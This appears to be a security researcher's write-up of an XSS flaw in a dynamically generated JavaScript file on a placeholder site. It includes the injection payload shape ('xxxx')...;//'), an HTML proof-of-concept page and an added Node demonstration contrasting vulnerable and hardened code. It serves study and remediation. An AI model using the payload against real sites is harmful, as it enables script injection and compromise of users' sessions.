XSS using a dynamically generated JS file
Severity: High
Complexity: Medium
Weakness: Disclosed JS endpoint & unsanitized user input
— — — — — — — — — — — — — — — — — — — — — — — — — — — —
Discovery :
- While checking requests in Burp Proxy I came across the following JavaScript file: https://www.site.com/mvcs/kt/tags/pclntny.js
- I started brute-forcing parameters on the JS endpoint and found ?cb=, which takes the user input and appends it to a getScript() call:
https://www.site.com/mvcs/kt/tags/pclntny.js?cb=xxxxxxxxx
- The response is served with Content-Type: text/plain, so we need to find a way to get our input rendered (executed) as script.
- Scripts loaded via <script src> are not restricted by the SOP and can be included by cross-domain requests; luckily the endpoint also sent no X-Content-Type-Options: nosniff header, so the browser will execute the text/plain response as JavaScript.
Now the task was to find where https://www.site.com/mvcs/kt/tags/pclntny.js is included in HTML/JavaScript under https://www.site.com/
- I used the Burp Proxy search filter option to look for that endpoint.
- Found that it is used in https://www.site.com/user/public/apps/tags?val=pcltny.js :
<script type="text/javascript" src="/mvcs/kt/tags/pclntny.js"></script>
...
var Doc = uri.queryKey['cb'];
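To make the primitive concrete, the following is an added example (not code from this writeup or from the target site). It models the vulnerable generator described above, where the cb query parameter is spliced verbatim into a getScript() call, beside a hardened version, and encodes the browser rule behind the "no nosniff header" observation. The script path and the cb parameter come from the writeup; the getScript URL template, the function names, the canary function and the header-check logic are assumptions made for the example.

```javascript
// Added example, not the writeup's or the target's code. Models a JS endpoint
// that splices the cb query parameter into a getScript() call, as described
// above, plus the hardened equivalent. The URL template is an assumption.
const SCRIPT_BASE = "/mvcs/kt/tags/pclntny.js?cb=";

// Vulnerable generator: cb (from uri.queryKey['cb']) lands inside a
// single-quoted string literal with no escaping, so a value containing
// ') closes the call and whatever follows runs as script.
function buildScriptVulnerable(cb) {
  return "getScript('" + SCRIPT_BASE + cb + "');";
}

// Hardened generator: encodeURIComponent keeps cb a plain query value and
// JSON.stringify emits a double-quoted JS literal with quotes, backslashes
// and line terminators escaped, so cb can never leave the string.
function buildScriptSafe(cb) {
  return "getScript(" + JSON.stringify(SCRIPT_BASE + encodeURIComponent(cb)) + ");";
}

// Runs a generated file the way the including page would: a stub getScript
// records its argument, and a canary function (assumed name "injected")
// counts how often attacker-controlled code actually executed.
function runGenerated(source) {
  const seen = { getScript: [], injected: 0 };
  const body = new Function("getScript", "injected", source);
  body((url) => seen.getScript.push(url), () => { seen.injected += 1; });
  return seen;
}

// Browser rule the attack relies on: for a cross-origin <script src>, a
// non-JavaScript Content-Type such as text/plain is refused only when
// X-Content-Type-Options: nosniff is present; without it the response is
// executed regardless of type. (Chrome's CORB additionally blocks bodies
// that sniff as HTML/XML/JSON, which a JavaScript body does not.)
// The MIME list is the common subset of JavaScript MIME types.
const JS_MIME_TYPES = new Set([
  "text/javascript", "application/javascript", "application/x-javascript",
  "text/ecmascript", "application/ecmascript", "text/jscript",
]);
function scriptWouldExecute(headers) {
  const norm = {};
  for (const [k, v] of Object.entries(headers)) norm[k.toLowerCase()] = String(v);
  const mime = (norm["content-type"] || "").split(";")[0].trim().toLowerCase();
  const nosniff = (norm["x-content-type-options"] || "").trim().toLowerCase() === "nosniff";
  return nosniff ? JS_MIME_TYPES.has(mime) : true;
}

// Constructed payload in the shape the writeup uses: close the quote and the
// call, run attacker code, then comment out the generator's trailing ');
const PAYLOAD = "xxxx');injected();//";

console.log(buildScriptVulnerable(PAYLOAD));
console.log(runGenerated(buildScriptVulnerable(PAYLOAD)));  // injected: 1
console.log(buildScriptSafe(PAYLOAD));
console.log(runGenerated(buildScriptSafe(PAYLOAD)));        // injected: 0
console.log(scriptWouldExecute({ "Content-Type": "text/plain" }));                                        // true
console.log(scriptWouldExecute({ "Content-Type": "text/plain", "X-Content-Type-Options": "nosniff" }));  // false
```

Run it with node: the vulnerable run reports injected: 1 because the payload becomes `getScript('...?cb=xxxx');injected();//');`, while the hardened run keeps the whole payload inside the URL string and reports 0. A real fix would also serve the file as application/javascript with nosniff, and preferably allowlist cb to a short token instead of relying on escaping alone.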
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
Exploitation :
- Simple POC :
<html>
<body>
<script src="https://www.site.com/mvcs/kt/tags/pclntny.js?cb=xxxx')<PAYLOAD-HERE>;"></script>
<script>
...
window.open('https://www.site.com/user/public/apps/tags?val=pcltny.js', '_blank').focus();
</script>
</body>
</html>
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
- Able to bypass their cross-domain policy by injecting AJAX requests.
Tools: https://github.com/maK-/parameth for checking parameters.